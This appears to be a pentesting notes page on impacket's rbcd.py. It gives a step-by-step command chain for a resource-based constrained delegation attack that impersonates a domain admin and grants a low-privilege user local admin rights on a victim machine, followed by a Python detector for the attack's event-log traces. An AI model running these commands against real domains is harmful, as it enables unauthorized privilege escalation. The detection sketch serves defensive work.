# rbcd.py
rbcd.py is part of [impacket](https://github.com/fortra/impacket).

## Example of doing the RBCD attack when you have the TGT of a user with write access to a victim machine

Delegate TO a victim box FROM the machine you added to AD:
```
rbcd.py -delegate-from 'GHOSTY$' -delegate-to 'VICTIMSYSTEM$' -action 'write' 'domain.com/user-you-have-a-TGT-for' -k -no-pass
```

Then use [getst](/pentesting/Internal/getst) to request a TGS on behalf of a high privilege user:
```
getST.py -impersonate 'domainadmin' -spn 'cifs/victim.domain.com' 'domain.com/GHOSTY$' -k -no-pass
export KRB5CCNAME=domainadmin.ccache
```

Then use [gettgt](/pentesting/Internal/gettgt) to request a TGT for the GHOSTY machine:
```
getTGT.py 'domain.com/GHOSTY$'
export KRB5CCNAME=GHOSTY.ccache
```
Then use [getst](/pentesting/Internal/getst) one more time to request a TGS on behalf of a high privilege user:
```
getST.py -impersonate 'domainadmin' -spn 'cifs/VICTIM.domain.com' 'domain.com/GHOSTY$'
```

Finally, use something like [net.py](/pentesting/Internal/net) to grant yourself local admin rights:
```
net.py -k -no-pass VICTIM localgroup -name Administrators -join lowpriv
```
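
On the detection side, the `write` action in the first step changes the target computer's `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute, which a domain controller logs as event 5136 when Directory Service Changes auditing and a matching SACL are in place. The sketch below is an added example, not part of impacket or of these notes: it flags such writes and raises severity when the same account also created a machine account (event 4741) shortly before. The JSON-lines export layout, the `Time` field name, the 24-hour window and the sample records are assumptions constructed for illustration, and events are assumed to arrive in chronological order.

```python
import json
from datetime import datetime, timedelta

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
VALUE_ADDED = "%%14674"        # OperationType "Value Added" in event 5136
WINDOW = timedelta(hours=24)   # assumed correlation window

# Constructed sample records, one JSON object per line. Field names follow
# Security log events 4741 and 5136; "Time" and all values are made up.
SAMPLE_LOG = """\
{"EventID":4741,"Time":"2024-05-01T10:00:00+00:00","SubjectUserName":"lowpriv","TargetUserName":"GHOSTY$"}
{"EventID":5136,"Time":"2024-05-01T10:03:00+00:00","SubjectUserName":"lowpriv","ObjectDN":"CN=VICTIMSYSTEM,CN=Computers,DC=domain,DC=com","AttributeLDAPDisplayName":"msDS-AllowedToActOnBehalfOfOtherIdentity","OperationType":"%%14674"}
{"EventID":5136,"Time":"2024-05-01T11:00:00+00:00","SubjectUserName":"helpdesk","ObjectDN":"CN=WS01,CN=Computers,DC=domain,DC=com","AttributeLDAPDisplayName":"description","OperationType":"%%14674"}
not-json garbage line
"""

def find_rbcd_writes(log_text, allowed_writers=()):
    """Return one alert per RBCD attribute write by a non-allowlisted account."""
    allowed = {w.lower() for w in allowed_writers}
    created = {}   # actor -> [(time, new machine account name), ...]
    alerts = []
    for line in log_text.splitlines():
        try:
            ev = json.loads(line)
            when = datetime.fromisoformat(ev["Time"])
            actor = ev["SubjectUserName"].lower()
        except (ValueError, KeyError, TypeError, AttributeError):
            continue  # skip malformed records instead of aborting the scan
        if ev.get("EventID") == 4741:
            created.setdefault(actor, []).append((when, ev.get("TargetUserName")))
        elif (ev.get("EventID") == 5136
              and str(ev.get("AttributeLDAPDisplayName", "")).lower() == RBCD_ATTR
              and ev.get("OperationType") == VALUE_ADDED
              and actor not in allowed):
            # Machine accounts this actor created inside the window before the write.
            recent = [name for t, name in created.get(actor, [])
                      if timedelta(0) <= when - t <= WINDOW]
            alerts.append({"time": ev["Time"], "actor": actor,
                           "target": ev.get("ObjectDN"),
                           "new_machine_accounts": recent,
                           "severity": "high" if recent else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in find_rbcd_writes(SAMPLE_LOG):
        print(json.dumps(alert))
```

Accounts that legitimately manage delegation can be passed in `allowed_writers` to suppress their writes.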
